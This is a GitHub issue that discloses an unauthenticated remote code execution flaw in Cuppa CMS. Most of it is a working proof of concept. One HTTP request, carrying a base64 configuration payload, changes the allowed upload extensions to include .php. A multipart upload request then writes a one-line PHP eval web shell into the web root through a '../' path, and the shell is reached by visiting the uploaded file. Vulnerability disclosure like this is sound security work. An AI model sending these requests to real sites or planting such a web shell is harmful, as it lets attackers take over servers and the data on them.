Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unauthorized Remote Code Execution vulnerability exists in Cuppa cms via file upload function #26

Open
bkfish opened this issue Feb 19, 2022 · 0 comments

Comments

@bkfish
Copy link

bkfish commented Feb 19, 2022

An Non-authenticated attacker can upload arbitrary file via the /js/jquery_file_upload/server/php/index.php and executing it on the server reaching the RCE.

poc

POST /classes/ajax/Functions.php HTTP/1.1
Host: localhost:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1061
Cookie:  country=us; language=en; administrator_document_path=%2F

file=eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IiJ9&function=saveConfigData

this request will set $allowed_extensions in Configuration.php will add .php
image

then upload a php file ,set the path as "../"

POST /js/jquery_file_upload/server/php/ HTTP/1.1
Host: localhost:8888
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------8021712423960420462477355542
Content-Length: 930

-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="path"

../
-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="unique_name"

true
-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="resize_width"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="resize_height"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="crop"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="compress"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="files[]"; filename="cmd.php"
Content-Type: image/jpeg


<?php @eval($_POST['cmd']);?>
-----------------------------8021712423960420462477355542--

image

uploadfile name can be seen in response "url":"..\/..\/..\/..\/media\/..\/\/cmd_1645281565.php"
as we can know,/media/../cmd_1645281565.php is as same as /cmd_1645281565.php
so visit /cmd_1645281565.php you can getshell

image

@bkfish bkfish changed the title An Remote Code Execution vulnerability exists in Cuppa cms via file upload function A Remote Code Execution vulnerability exists in Cuppa cms via file upload function Feb 19, 2022
@bkfish bkfish changed the title A Remote Code Execution vulnerability exists in Cuppa cms via file upload function A Non-authenticated Remote Code Execution vulnerability exists in Cuppa cms via file upload function Feb 19, 2022
@bkfish bkfish changed the title A Non-authenticated Remote Code Execution vulnerability exists in Cuppa cms via file upload function Non-authenticated Remote Code Execution vulnerability exists in Cuppa cms via file upload function Feb 19, 2022
@bkfish bkfish changed the title Non-authenticated Remote Code Execution vulnerability exists in Cuppa cms via file upload function Unauthorized Remote Code Execution vulnerability exists in Cuppa cms via file upload function Feb 19, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant